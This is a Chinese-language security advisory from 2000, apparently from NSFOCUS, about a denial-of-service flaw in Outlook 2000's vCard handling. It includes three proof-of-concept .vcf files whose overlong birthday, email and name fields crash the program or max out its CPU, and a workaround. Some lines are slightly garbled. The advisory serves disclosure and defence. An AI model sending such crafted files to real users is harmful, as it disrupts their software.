安全研究
安全漏洞
微软Outlook 2000对Vcard的处理存在DoS漏洞
发布日期:2000-09-04
更新日期:2000-09-04
受影响系统:
描述:
Microsoft Outlook 2000
由于在对某些vcard域的处理上存在问题,微软Outlook 2000容易受到DoS的攻击。
如果vcard(.vcf文件)中的特定的域包含75个以上的字符,则当用户打开该文件时Outlook 2000会停止响应。Outlook在导入和打开vcard文件(.vcf)之前会用一个警告来提示用户,但是如果用户将该文件保存到某个目录中然后在资源管理器中打开它则不会得到任何警告。
如下受影响的域能够导致CPU利用率升高:
name:
nickname:
fn:
title:
title;language=value=text:
tel:
tel;<label>:
tel;<label>,<label>:
如下的域会导致Outlook 2000终止运行:
mail:
bday; value=date
<* 来源:joelmoses@mindspring.com *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1、修改“bday‘域使其超过55个字符。这个例子将使Outlook 2000溢出并终止运行。
EGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915130848273492749723947923749273942394792734972394729374927
4982739472937492873
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD
2、修改“e-mail”域,用长字符串作为e-mail地址。这个例子将使Outlook 2000溢出并终止运行。
utlook 2000 to overflow and terminate. BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de.sadsack.nothing.doing.is.an.overflo
.possible.sadsack.not hing.doing.is.an.overflow.possible. <此处略去很多字> .sadsack.nothing.doing.is.an.overflow.possible.com
REV:20000830T191121Z
END:VCARD
3、修改“N”或“Name”域,用长串作为该域的内容。这个例子不会导致Outlook终止运行,但是会使CPU占用率达到99%。
BEGIN:VCARD
VERSION:2.1
N:Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger Meister <此处略去很多字符> Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger MeisterBerger MeisterBerger Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD
建议:
去掉Outlook与.vcf文件的关联。
浏览次数:6017
严重程度:0(网友投票)
绿盟科技给您安全的保障